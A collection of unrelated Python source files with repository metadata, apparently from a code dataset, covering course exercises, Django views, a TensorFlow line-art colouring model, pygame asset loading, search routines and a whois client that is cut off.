981d0b7d42384fb91e0a4dbc2b3e07ad6d587524 | 52a1cadbb76531065fadbfc29d8e8faa644f38ce | /day 3_8.py | 6d1191cb39b1864bbb7086cd349442fab19c90d7 | [] | no_license | Harshil-Madaan/PythonCourse | d602eb6f4b031e2477eb21c47e79308e3ade9862 | 8590703cda1d6bdbe9bbe730d376a585a4437562 | refs/heads/master | 2022-12-04T22:00:34.727481 | 2022-11-16T03:57:56 | 2022-11-16T03:57:56 | 231,540,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | food=input("what is your favourite food?")
if(food=='pizza'):
print("the answer is correct")
| [
"[email protected]"
] | |
a709c958c12a1c8bfdb511004e2eeaa5e8856efe | 6400d27c98dc94171132ce56782bfd750f5eacee | /runarrange.py | 84153e5b17686222efc992550b8dd7fffac04bb2 | [
"MIT"
] | permissive | SutirthaChakraborty/LeaderSTeM | a0e3cb038d7fbbd489884dc3f8e312c82689309f | 25dfbb14d4d62444d5ebe7721644a250b3024e5d | refs/heads/master | 2023-01-13T14:35:05.343219 | 2020-11-14T10:12:37 | 2020-11-14T10:12:37 | 282,326,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | import os
txt="list2.txt"
with open(txt) as f:
lines=f.read().splitlines()
for i in lines:
print(i)
os.system("python ArrangeDataset.py "+i) | [
"[email protected]"
] | |
f746c7225f80a100d3823d8f0ba8896ce614b991 | 602f1d5ce6610cce4053f6b1b5bb5a5e8d87df4c | /Robin/DataStructures/Wrappers/__init__.py | 28e49b230b113efa603f0d75a8a8678971234a34 | [] | no_license | Robin-Dillen/gas | 082bbfad7777171bce18e7f426924eee1a17424e | 5ef22f5b6323e6b25dee91ecfac6fa450d27a7c9 | refs/heads/main | 2023-04-25T09:53:46.726081 | 2021-05-10T10:35:53 | 2021-05-10T10:35:53 | 327,727,013 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | from .BSTTable import BSTTable
from .LinkedChainTable import LinkedChainTable
from .RBTTable import RedBlackTreeTable
| [
"[email protected]"
] | |
4327c210401985604466939fc38f10691eaa2bd7 | e92209e1e8916ca9fbf44dcc11dd3093d47a77f6 | /homework/views.py | 78d8410d6bf9589cd7b70f95ed039a18b5351313 | [] | no_license | zhangwei725/django_model | 2a7bce0c86464604a06377932e0db92703a1a719 | 1bfd12dd11f3ac501131fd6751a70c753e711d01 | refs/heads/master | 2020-04-06T13:59:08.694788 | 2018-11-14T09:19:33 | 2018-11-14T09:19:33 | 157,522,750 | 9 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | from django.shortcuts import render
from model02.models import Goods
def shops(request):
goods = Goods.objects.all()
return render(request, 'shops.html', context={'goods': goods})
def emp_list(request):
return render(request, 'emp_list.html')
| [
"[email protected]"
] | |
0d90aed2abf8631bd27350edf155dbaa887357d0 | 0435f7790fa66b6263d1b9ccbf255892321eb205 | /guess_colors.py | 33607b8bacf9a3197ca7a0a517c178fb15b8e757 | [] | no_license | cryingmiso/Deep-Auto-Coloring | 698d1252f2a676306a1bc2a2427dab33286d4882 | 0e2c31a33b2f34db7a5199712a4932b8e3c421ef | refs/heads/master | 2020-03-12T19:21:58.073487 | 2018-06-29T04:42:16 | 2018-06-29T04:42:16 | 130,783,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,899 | py | import tensorflow as tf
import numpy as np
import os
from glob import glob
import sys
import math
from random import randint
from utils import *
import utils
class Palette():
def __init__(self, imgsize=256, batchsize=4):
print("Loading Palatte")
self.batch_size = batchsize
self.batch_size_sqrt = int(math.sqrt(self.batch_size))
self.image_size = imgsize
self.output_size = imgsize
self.gf_dim = 64
self.df_dim = 64
self.z_dim = 64
self.input_colors = 1
self.input_colors2 = 3
self.output_colors = 3
bnreset()
self.line_images = tf.placeholder(tf.float32, [self.batch_size, self.image_size, self.image_size, self.input_colors])
self.real_images = tf.placeholder(tf.float32, [self.batch_size, self.image_size/16, self.image_size/16, self.output_colors])
with tf.variable_scope("col"):
z_mean, z_stddev = self.encoder(self.real_images)
samples = tf.random_normal([self.batch_size, self.z_dim], 0, 1, dtype=tf.float32)
self.guessed_z = z_mean + (z_stddev * samples)
# references: line_images,
self.generated_images = self.generator(self.line_images, self.guessed_z)
self.g_loss = tf.reduce_mean(tf.abs(self.real_images - self.generated_images)) * 100
self.l_loss = tf.reduce_mean(0.5 * tf.reduce_sum(tf.square(z_mean) + tf.square(z_stddev) - tf.log(tf.square(z_stddev)) - 1, axis=1))
self.cost = tf.reduce_mean(self.g_loss + self.l_loss)
t_vars = tf.trainable_variables()
self.g_vars = [var for var in t_vars if ('col' in var.name)]
self.g_optim = tf.train.AdamOptimizer(0.0002, beta1=0.5).minimize(self.cost, var_list=self.g_vars)
def encoder(self, real_imgs):
with tf.variable_scope(tf.get_variable_scope(), reuse=False):
h0 = lrelu(conv2d(real_imgs, self.df_dim, name="e_h0_col")) #128 x 128 x 64
h1 = lrelu(bn(conv2d(h0, self.df_dim, name="e_h1_col"))) #64 x 64 x 64
h2 = lrelu(bn(conv2d(h1, self.df_dim, name="e_h2_col"))) #32
h3 = lrelu(bn(conv2d(h2, self.df_dim, name="e_h3_col"))) #16
h4 = lrelu(bn(conv2d(h3, self.df_dim, name="e_h4_col"))) #8
h5 = lrelu(bn(conv2d(h4, self.df_dim, name="e_h5_col"))) #4
mean = linear(tf.reshape(h5, [self.batch_size, -1]), self.z_dim, "e_mean_col") #(4*4*64) -> 64
stddev = linear(tf.reshape(h5, [self.batch_size, -1]), self.z_dim, "e_stddev_col") #(4*4*64) -> 64
return mean, stddev
def generator(self, img_in, z):
with tf.variable_scope(tf.get_variable_scope(), reuse=False):
s = self.output_size
s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128)
z0 = linear(z, (self.image_size/64)*(self.image_size/64)*self.df_dim, "g_z0_col") # 4 x 4 x 64
z1 = tf.reshape(z0, [self.batch_size, int(self.image_size/64), int(self.image_size/64), self.df_dim])
# image is (256 x 256 x input_c_dim)
e1 = conv2d(img_in, self.gf_dim, name='g_e1_conv_col') # e1 is (128 x 128 x self.gf_dim)
e2 = bn(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv_col')) # e2 is (64 x 64 x self.gf_dim*2)
e3 = bn(conv2d(lrelu(e2), self.gf_dim*2, name='g_e3_conv_col')) # e3 is (32 x 32 x self.gf_dim*2)
e4 = bn(conv2d(lrelu(e3), self.gf_dim*2, name='g_e4_conv_col')) # e4 is (16 x 16 x self.gf_dim*2)
e5 = bn(conv2d(lrelu(e4), self.gf_dim*2, name='g_e5_conv_col')) # e4 is (8 x 8 x self.gf_dim*2)
e6 = bn(conv2d(lrelu(e5), self.gf_dim*4, name='g_e6_conv_col')) # e4 is (4 x 4 x self.gf_dim*2)
combined = tf.concat([z1, e6],3)
e7 = bn(deconv2d(combined, [self.batch_size, int(self.image_size/32), int(self.image_size/32), int(self.gf_dim*4)], name='g_e7_conv_col')) # e4 is (8 x 8 x self.gf_dim*2)
e8 = deconv2d(lrelu(e7), [self.batch_size, int(self.image_size/16), int(self.image_size/16), 3], name='g_e8_conv_col') # e5 is (16 x 16 x 3)
return tf.nn.tanh(e8)
def imgprocess(self, cimg, sampling=False):
num_segs = 16
seg_len = 256/num_segs
seg = np.ones((num_segs, num_segs, 3))
for x in xrange(num_segs):
for y in xrange(num_segs):
seg[x:(x+1), y:(y+1), 0] = np.average(cimg[x*seg_len:(x+1)*seg_len, y*seg_len:(y+1)*seg_len, 0])
seg[x:(x+1), y:(y+1), 1] = np.average(cimg[x*seg_len:(x+1)*seg_len, y*seg_len:(y+1)*seg_len, 1])
seg[x:(x+1), y:(y+1), 2] = np.average(cimg[x*seg_len:(x+1)*seg_len, y*seg_len:(y+1)*seg_len, 2])
return seg
def train(self):
s = tf.Session()
s.run(tf.initialize_all_variables())
self.loadmodel(s)
data = glob(os.path.join("imgs", "*.jpg"))
print(data[0])
base = np.array([get_image(sample_file) for sample_file in data[0:self.batch_size]])
base_edge = np.array([cv2.adaptiveThreshold(cv2.cvtColor(ba, cv2.COLOR_BGR2GRAY), 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, blockSize=9, C=2) for ba in base]) / 255.0
base_edge = np.expand_dims(base_edge, 3)
base_colors = np.array([self.imgprocess(ba) for ba in base]) / 255.0
ims("results/base_line.jpg",merge(base_edge, [self.batch_size_sqrt, self.batch_size_sqrt]))
ims("results/base_colors.jpg",merge_color(np.array([cv2.resize(x, (256,256), interpolation=cv2.INTER_NEAREST) for x in base_colors]), [self.batch_size_sqrt, self.batch_size_sqrt]))
datalen = len(data)
for e in xrange(20000):
for i in range(datalen / self.batch_size):
batch_files = data[i*self.batch_size:(i+1)*self.batch_size]
batch = np.array([get_image(batch_file) for batch_file in batch_files])
batch_edge = np.array([cv2.adaptiveThreshold(cv2.cvtColor(ba, cv2.COLOR_BGR2GRAY), 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, blockSize=9, C=2) for ba in batch]) / 255.0
batch_edge = np.expand_dims(batch_edge, 3)
batch_colors = np.array([self.imgprocess(ba) for ba in batch]) / 255.0
g_loss, l_loss, _ = self.sess.run([self.g_loss, self.l_loss, self.g_optim], feed_dict={self.real_images: batch_colors, self.line_images: batch_edge})
print("%d: [%d / %d] l_loss %f, g_loss %f" % (e, i, (datalen/self.batch_size), l_loss, g_loss))
if i % 100 == 0:
recreation = self.sess.run(self.generated_images, feed_dict={self.real_images: base_colors, self.line_images: base_edge})
print(recreation.shape)
ims("results/"+str(e*100000 + i)+"_base.jpg",merge_color(np.array([cv2.resize(x, (256,256), interpolation=cv2.INTER_NEAREST) for x in recreation]), [self.batch_size_sqrt, self.batch_size_sqrt]))
recreation = self.sess.run(self.generated_images, feed_dict={self.real_images: batch_colors, self.line_images: batch_edge})
ims("results/"+str(e*100000 + i)+".jpg",merge_color(np.array([cv2.resize(x, (256,256), interpolation=cv2.INTER_NEAREST) for x in recreation]), [self.batch_size_sqrt, self.batch_size_sqrt]))
ims("results/"+str(e*100000 + i)+"_line.jpg",merge(batch_edge, [self.batch_size_sqrt, self.batch_size_sqrt]))
ims("results/"+str(e*100000 + i)+"_original.jpg",merge_color(np.array([cv2.resize(x, (256,256), interpolation=cv2.INTER_NEAREST) for x in batch_colors]), [self.batch_size_sqrt, self.batch_size_sqrt]))
if i % 1000 == 0:
self.save("./checkpoint", e*100000 + i)
def loadmodel(self, sess, load_discrim=True):
self.sess = sess
# self.sess.run(tf.initialize_all_variables())
if load_discrim:
self.saver = tf.train.Saver()
else:
self.saver = tf.train.Saver(self.g_vars)
print([v.name for v in self.g_vars])
if self.load("./checkpoint"):
print("Loaded")
else:
print("Load failed")
def sample(self):
s = tf.Session()
s.run(tf.initialize_all_variables())
self.loadmodel(s, False)
data = glob(os.path.join("imgs", "*.jpg"))
datalen = len(data)
for i in range(min(100,datalen / self.batch_size)):
batch_files = data[i*self.batch_size:(i+1)*self.batch_size]
batch = np.array([cv2.resize(imread(batch_file), (256,256)) for batch_file in batch_files])
batch_normalized = batch/255.0
random_z = np.random.normal(0, 1, [self.batch_size, self.z_dim])
batch_edge = np.array([cv2.adaptiveThreshold(cv2.cvtColor(ba, cv2.COLOR_BGR2GRAY), 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, blockSize=9, C=2) for ba in batch]) / 255.0
batch_edge = np.expand_dims(batch_edge, 3)
recreation = self.sess.run(self.generated_images, feed_dict={self.line_images: batch_edge, self.guessed_z: random_z})
ims("results/sample_"+str(i)+".jpg",merge_color(np.array([cv2.resize(x, (256,256), interpolation=cv2.INTER_NEAREST) for x in recreation]), [self.batch_size_sqrt, self.batch_size_sqrt]))
ims("results/sample_"+str(i)+"_origin.jpg",merge_color(batch_normalized, [self.batch_size_sqrt, self.batch_size_sqrt]))
ims("results/sample_"+str(i)+"_line.jpg",merge_color(batch_edge, [self.batch_size_sqrt, self.batch_size_sqrt]))
def save(self, checkpoint_dir, step):
model_name = "model"
model_dir = "tr_colors"
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir):
print(" [*] Reading checkpoint...")
model_dir = "tr_colors"
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
return True
else:
return False
if __name__ == '__main__':
if len(sys.argv) < 2:
print("Usage: python main.py [train, sample]")
else:
cmd = sys.argv[1]
if cmd == "train":
c = Palette()
c.train()
elif cmd == "sample":
c = Palette(256,1)
c.sample()
else:
print("Usage: python main.py [train, sample]")
| [
"[email protected]"
] | |
68faa6edb58189ee11752aad38f554cb7cf99844 | d79978e32325bedb0ea9eba911d92c04e490ea2b | /pocket/image.py | 7a702a7a6a4a8f26481bd4a3c4553176e0620577 | [] | no_license | hypan599/mr_jack | b3e7f74c66a1472773ce51cff4c2b8b766aa6f08 | e767a6fc999707abcf66187b544961898c6070a8 | refs/heads/master | 2023-03-10T09:18:35.532169 | 2019-09-21T20:23:58 | 2019-09-21T20:23:58 | 112,902,900 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,668 | py | # -*- coding:utf-8 -*-
import pygame
import os
pygame.init()
screen = pygame.display.set_mode((1560, 920), 0, 32)
font = pygame.font.Font("msyh.ttf", 30)
# color
yellow = 128, 128, 0
grey = 128, 128, 128
white = 255, 255, 255
black = 0, 0, 0
root_path = "images" + os.sep
hourglass = pygame.image.load(root_path + "hourglass.PNG").convert_alpha()
begin = pygame.image.load(root_path + "begin.jpg").convert()
button_mouse_on = pygame.image.load(root_path + "button_mouse_on.PNG").convert_alpha()
map_path = root_path + "map" + os.sep
image_dict = {'guaidaojide': {},
'maolilan': {},
'huiyuanai': {},
'aliboshi': {},
'mumushisan': {},
'chijingxiuyi': {},
'beiermode': {},
'yuanshanheye': {},
'lingmuyuanzi': {}
}
states = [str(j) + str(i) for j in range(2) for i in range(4)] # ['00', '01', '02', '03', '10', '11', '12', '13']
for name, d in image_dict.items():
for state in states:
file = map_path + name + state + ".JPG"
d[name + state] = pygame.image.load(file).convert()
map_mouse_on = pygame.image.load(map_path + "map_mouse_on.PNG").convert_alpha()
map_used = pygame.image.load(map_path + "map_used.PNG").convert_alpha()
detective_path = root_path + "detective" + os.sep
detective_images = {"kenan": pygame.image.load("images/detective/kenan.PNG").convert_alpha(),
"maolixiaowulang": pygame.image.load("images/detective/maolixiaowulang.PNG").convert_alpha(),
"fubupingci": pygame.image.load("images/detective/fubupingci.PNG").convert_alpha()
}
detective_mouse_on = pygame.image.load(detective_path + "detective_mouse_on.PNG").convert_alpha()
detective_available = pygame.image.load(detective_path + "detective_available.PNG").convert_alpha()
action_card_path = root_path + "action" + os.sep
action_card_images = {
"1f": pygame.image.load("images/action/1f.PNG").convert_alpha(),
"1b": pygame.image.load("images/action/1b.PNG").convert_alpha(),
"2f": pygame.image.load("images/action/2f.PNG").convert_alpha(),
"2b": pygame.image.load("images/action/2b.PNG").convert_alpha(),
"3f": pygame.image.load("images/action/3f.PNG").convert_alpha(),
"3b": pygame.image.load("images/action/3b.PNG").convert_alpha(),
"4f": pygame.image.load("images/action/4f.PNG").convert_alpha(),
"4b": pygame.image.load("images/action/4b.PNG").convert_alpha()
}
action_mouse_on = pygame.image.load(action_card_path + "action_mouse_on.PNG").convert_alpha()
action_used = pygame.image.load(action_card_path + "action_used.PNG").convert_alpha()
| [
"[email protected]"
] | |
cf0a90367e21ba85660810a07515523155104fb6 | f0a2d759e2fa0c6f2484b3859d8c97ae90168578 | /ffl/setup.py | 92220ec627a4bd835d731c7c807b7d0901f4a418 | [] | no_license | cjsantucci/fantasyTool | 9e817f2f8d129a008940b3df1ad7afaa94f62ea2 | 77e41c2f9b8c05165aefc4b38f3dd1d97dbe7063 | refs/heads/master | 2021-01-19T13:33:33.956244 | 2017-09-09T03:20:54 | 2017-09-09T03:20:54 | 82,398,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | from setuptools import setup
setup(
name = 'ffl',
version = '1.0',
description = "XML data parser for fantasy sports",
author = 'Chris Sandy and Ken Kohler',
author_email = '[email protected]',
license = 'MIT',
url = 'https://github.com/cjsantucci/fantasyTool/',
packages = [ "ffl", "compute", "grabbers", "vis" ],
install_requires = []
) | [
"[email protected]"
] | |
99fa4242ead8dd989e34feaa87b6080746b5a648 | d98d39282ab35e1556cce25ac706ba607b34b0e5 | /Greedy Algorithms/Maximum Number of Prizes/maximum_number_of_prizes_unit_tests.py | 150769f066900b1f02fa317deba12a4e2d583544 | [] | no_license | grommy/algorithmic_toolbox | e2129ade8bb2a69d34bf8ad9693090b96dadaef3 | bd39a7753c54ce0831381c180f96b7500d506c3e | refs/heads/master | 2023-09-05T19:02:37.397238 | 2021-11-19T14:59:41 | 2021-11-19T14:59:41 | 429,762,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 549 | py | import unittest
from maximum_number_of_prizes import compute_optimal_summands
class MaximumNumberOfPrizes(unittest.TestCase):
def test(self):
for (n, answer) in [(1, 1), (6, 3), (100, 13), (4, 2)]:
summands = compute_optimal_summands(n)
self.assertEqual(len(summands), answer)
self.assertEqual(sum(summands), n)
summands = sorted(summands)
self.assertTrue(all(summands[i] < summands[i + 1] for i in range(len(summands) - 1)))
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
629734b25037a9e9e3d1c41b2b77b21995f923c2 | d9be5e5cc6c302d27fe0e61dbb04b33eec89c94a | /interviewAssigner/Assigner/migrations/0003_auto_20190927_2008.py | 8096ccdaee19b6b2ddd1b2b7bca390253ea45e3e | [] | no_license | aswanthkoleri/interviewbit-interview-question-solution | c79ea670f70359373e334f4418b1b2a27278854e | e2a2315b609b0cf954cec72a339aad543a09b163 | refs/heads/master | 2020-08-02T11:56:09.777168 | 2019-09-27T20:34:01 | 2019-09-27T20:34:01 | 211,343,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | # Generated by Django 2.1.7 on 2019-09-27 20:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Assigner', '0002_auto_20190927_1942'),
]
operations = [
migrations.AlterField(
model_name='interview',
name='dateTime',
field=models.DateField(),
),
]
| [
"[email protected]"
] | |
1eeff8a6c9c7b758a4cd159661176f269703c660 | 357432c4126ed339a52eea6b74b013e26b168f35 | /custom_user/migrations/0001_initial.py | 928dc47adcd55099bb13c0e6a194059bce10e411 | [] | no_license | CAPCHIK/trytoimpress | e5fcf04be7281a0d589d8f2df9d912602366e6bc | 0fb0b93d3f72b02009f45d37cbf669e7dabf6c3f | refs/heads/master | 2023-04-07T03:59:53.229006 | 2021-04-14T17:22:11 | 2021-04-14T17:22:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,138 | py | # Generated by Django 3.2 on 2021-04-12 19:32
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CustomUser',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('email', models.EmailField(max_length=63, unique=True, verbose_name='ะะดัะตั ัะปะตะบััะพะฝะฝะพะน ะฟะพััั')),
('date_joined', models.DateTimeField(auto_now_add=True)),
('last_login', models.DateTimeField(auto_now=True)),
('is_admin', models.BooleanField(default=False)),
('is_staff', models.BooleanField(default=False)),
('is_active', models.BooleanField(default=True)),
('is_superuser', models.BooleanField(default=False)),
],
options={
'abstract': False,
},
),
]
| [
"[email protected]"
] | |
f80575a2cf3deabe40265f47e2b9abf084531b37 | 46357db3b1c1af699384d9cba1ffbc3c732117ad | /pytest_tutorial/basics/test_sample2.py | b47c62dc8c09358391bad0cc064fbefd13dd00fa | [] | permissive | khanhdodang/automation-training-python | 28fbd70ca4bc84e47cf17d1e4702513863e38c44 | b16143961cee869c7555b449e2a05abeae2dc3b5 | refs/heads/master | 2023-07-11T05:21:34.495851 | 2021-08-18T01:29:37 | 2021-08-18T01:29:37 | 285,208,030 | 0 | 8 | MIT | 2020-09-29T07:01:15 | 2020-08-05T07:01:46 | Python | UTF-8 | Python | false | false | 216 | py | import pytest
def test_file2_method1():
x=5
y=6
assert x+1 == y,"test failed"
assert x == y,"test failed because x=" + str(x) + " y=" + str(y)
def test_file2_method2():
x=5
y=6
assert x+1 == y,"test failed"
| [
"[email protected]"
] | |
1aa6b1f6e602ea484a6118bb577a879a60aa4068 | 99848dc3b916ca104690be7e9b43b9ed3ead1100 | /eboard/clients/apps.py | 74c29bd24dfd60cde3bbca81a9c82c8b6bf4aa8b | [] | no_license | Sammra-22/CS-Eboard | 45e24714d0320dcb29b595fe9d49d46ed340547b | d45f4b3149607b58389b3d32cd60dc514826ff58 | refs/heads/master | 2022-02-23T17:46:38.469113 | 2019-10-13T12:35:00 | 2019-10-13T12:35:00 | 214,808,712 | 0 | 0 | null | 2022-01-21T20:03:52 | 2019-10-13T11:33:16 | Python | UTF-8 | Python | false | false | 96 | py | from django.apps import AppConfig
class ClientsConfig(AppConfig):
name = 'eboard.clients'
| [
"[email protected]"
] | |
ac07756fec1c7a9602729712f74185d4631e88a2 | 9b021fc76be68b3a9fd886102bfda94b4899f583 | /sequential_search.py | 6fa797d988c949fdd59854c450543475096cc646 | [] | no_license | bhsaurabh/python-practice | 93f89446f0ecd9fc62b4a300bd0db029d948062b | 177b027820ef8504198852cc168268eab34d1447 | refs/heads/master | 2020-06-07T04:34:06.269652 | 2014-06-22T15:55:16 | 2014-06-22T15:55:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 930 | py | #!/usr/bin/python
def search(a_list, item):
"""
Search for an item in a list
O(N)
Args:
a_list: List to search in
item: Item to search for
Returns:
True, if item is found; False otherwise
"""
for el in a_list:
if el == item:
return True
return False
def ordered_search(a_list, item):
"""
Sequential search on an ordered list
O(N)
"""
for el in a_list:
if el == item:
return True # element found!
elif el > item:
# no more items need to be compared and the element is not in the list
break
return False
if __name__ == '__main__':
print(search([1,2,3,4,5,6,7,8,9], 7))
print(search([1,2,3,4,5,6,7,8,9], 0))
print(ordered_search([1,2,3,4,5,6,7,8,9], 7))
print(ordered_search([1,2,3,4,5,6,7,8,9], 10))
print(ordered_search([1,2,3,4,5,6,7,8,9], -1)) | [
"[email protected]"
] | |
9a0921bfc0b020a52319468a4533f51f8849f0d0 | ebb950e622e70c3b014d927ad017e42b78df2559 | /string_to_int.py | ff28e4648fa024a0029bf061065bb8ce785d4c04 | [] | no_license | KathaVachhani/Coding | 285525fc95992f20c14877764a187067d613f390 | 8130f91f1129405af381085285ea555c166c3e91 | refs/heads/master | 2022-12-29T00:22:42.791505 | 2020-10-16T10:34:15 | 2020-10-16T10:34:15 | 292,222,614 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | l=[('Tom', '12/04/1999', '65kg'), ('Ab de', '17/02/1990', '63kg'), ('Kholi', '16/02/1985', '62kg'), ('Chahal', '25/09/1985', '61kg')]
# print(len(l))
s_n=[]
s_b=[]
s_w=[]
for i in l:
s_n.append(i[0])
s_b.append(i[1])
l=len(i[2])-2
s_w.append(int(i[2][0:l]))
print('Student name: ',s_n)
print('Student birthday: ',s_b)
print('Student weight: ',s_w) | [
"[email protected]"
] | |
4a3eaaaf6f9d8d3ecbb972131f7739edc3fa88b9 | 2749f9ac3c4bace174f171873775181f2e09ebfa | /strings/ex6_string_validators.py | b2a6c158d56f2b91958a415dcd34f6ee4bef9ef5 | [] | no_license | 0xhappy33/hackerrank_python | 82eb38573058ad13c24aebd049fec75ee5d1769f | 0c5c20a4c1763f31b9eb9fd96c5f754269699229 | refs/heads/master | 2023-05-25T22:07:16.317166 | 2018-02-06T08:50:28 | 2018-02-06T08:50:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | if __name__ == '__main__':
s = input()
# for method in [s.isalnum(), s.isalpha(), s.isdigit(), s.islower(), s.isupper()] :
# print(any(method(c) for c in s))
for test in ('isalnum', 'isalpha', 'isdigit', 'islower', 'isupper'):
print(any(eval("c." + test + "()") for c in s))
| [
"[email protected]"
] | |
4090f3954d79fa95b3147542ae914954ce50ced1 | c066e22a14eb4bfaceeced7d1d9ced751b881862 | /tests/test_flask.py | fa1c00d487473b6897c28232c3b96aadc801353e | [] | no_license | mkobar/flaskleap | 10eed89fdf02e466f654bbcf268ae5eaa9e0c50f | a185e74bd6a1798481be99825eb2e9767a28d783 | refs/heads/master | 2023-03-20T18:45:28.438145 | 2017-08-09T05:50:22 | 2017-08-09T05:50:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,310 | py | from __future__ import absolute_import
from codegen.parser import Swagger
from codegen.flask import (
_swagger_to_flask_url,
_path_to_endpoint,
_path_to_resource_name,
FlaskGenerator
)
def test_swagger_to_flask_url():
cases = [
{
'url': '/users/{id}',
'data': {
'parameters': [{
'name': 'id',
'in': 'path',
'type': 'integer'
}],
'get': {
'parameters': [{
'name': 'limit',
'in': 'query',
'type': 'integer'
}]
},
'post': {
'parameters': [{
'name': 'user',
'in': 'body',
'schema': {
'properties': {
'name': {'type': 'string'}
}
}
}]
}
},
'expect': (
'/users/<int:id>',
['id']
)
},
{
'url': '/goods/categories/{category}/price-large-than/{price}/order-by/{order}',
'data': {
'get': {
'parameters': [{
'name': 'limit',
'in': 'query',
'type': 'integer'
}, {
'name': 'order',
'in': 'path',
'type': 'string'
}, {
'name': 'price',
'in': 'path',
'type': 'float'
}]
},
'parameters': [{
'name': 'category',
'in': 'path',
'type': 'integer'
}]
},
'expect': (
'/goods/categories/<int:category>/price-large-than/<float:price>/order-by/<order>',
['category', 'price', 'order']
)
},
{
'url': '/products/{product_id}',
'data': {},
'expect': (
'/products/<product_id>',
['product_id']
)
}
]
for case in cases:
assert _swagger_to_flask_url(case['url'], case['data']) == case['expect']
def test_path_to_endpoint():
cases = [{
'path': '/users/{id}',
'expect': 'users_id'
}, {
'path': '/users/{id}/profile',
'expect': 'users_id_profile'
}, {
'path': '/users/{id}/hat-size',
'expect': 'users_id_hat_size'
}]
for case in cases:
assert _path_to_endpoint(case['path']) == case['expect']
def test_path_to_resource_name():
cases = [{
'path': '/users/{id}',
'expect': 'UsersId'
}, {
'path': '/users/{id}/profile',
'expect': 'UsersIdProfile'
}, {
'path': '/posts/{post_id}/last-reply',
'expect': 'PostsPostIdLastReply'
}]
for case in cases:
assert _path_to_resource_name(case['path']) == case['expect']
def test_process_data():
data = {
'paths': {
'/users': {
'get': {},
'put': {},
'head': {},
'parameters': []
},
'/posts/{post_id}': {
'get': {
'parameters': [
{'name': 'post_id', 'in': 'path', 'type': 'integer'},
{'name': 'page', 'in': 'query', 'type': 'integer'}
]
}
}
}
}
swagger = Swagger(data)
generator = FlaskGenerator(swagger)
schemas, routes, view1, view2 = list(generator.generate())[:4]
view1, view2 = sorted([view1, view2], key=lambda x: x.data['name'])
assert ('posts_post_id', 'GET') in schemas.data['validators']
assert schemas.data['validators'][('posts_post_id', 'GET')]['args']['properties']['page']['type'] == 'integer'
assert view1.data['url'] == '/posts/<int:post_id>'
assert view1.data['name'] == 'PostsPostId'
| [
"[email protected]"
] | |
da518403dfa304abfd8ff3784a3ce7d274b22794 | 8e9150fd18c5f6a1aee81d27f383fcab04945221 | /ENCODN/FRAMES/RADIOACTIVITY.py | e5e6401d50f2898c60ce86062702be9890b44fe7 | [
"MIT"
] | permissive | akshitadixit/ENCODN | 04e3297722e77bba92d1dcb4d9947663514ce110 | 7b4ecaba10314f9f59f53e9b479016b21f8b632b | refs/heads/main | 2023-03-07T02:30:46.313429 | 2021-01-22T07:13:30 | 2021-01-22T07:13:30 | 340,953,231 | 0 | 1 | MIT | 2021-02-21T16:54:37 | 2021-02-21T16:54:36 | null | UTF-8 | Python | false | false | 713 | py | from tkinter import *
from tkinter import ttk
t_names = ["RADIOACTIVITY"]
frames = []
fr_names = []
def RADIOACTIVITY(master=None):
s = ttk.Style(master)
s.configure('lefttab.TNotebook',padding=[20,20], tabposition='wn')
nb = ttk.Notebook(master, s='lefttab.TNotebook', width=800, height=570)
nb.grid(row=0, column=0, sticky="e", padx=20, pady=15)
nb.grid_propagate(0)
for i in range(len(t_names)):
frames.append(Frame(nb,bg="#7ad159", width = 750, height=500))
nb.add(frames[i], text=t_names[i])
#calling frame setups here
for i in range(len(fr_names)):
fr_names[i](frames[i])
#calling frame setups here
for i in range(len(fr_names)):
fr_names[i](frames[i])
| [
"[email protected]"
] | |
9732fd344954ff4e88a31303d0349104261cfd94 | 3f8999a077b4e9ca50241eddc5cd0f86284f4466 | /asn-to-ipv4.py | 26cb91f520e9925d4252bc316f59b58719d5b282 | [] | no_license | kendokan/pfSense-enhancements | 1a8abfa8e7f34341e51e3b3fed66c721d5230a77 | d4627818c436d766c3879dce58401300276e0341 | refs/heads/master | 2021-09-05T14:14:35.986805 | 2018-01-28T17:44:01 | 2018-01-28T17:44:01 | 112,949,055 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,096 | py | #!/usr/bin/env python2
import socket
import re
## https://tools.ietf.org/html/rfc3912
def whois_request(domain, server, port=43):
_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_sock.connect((server, port))
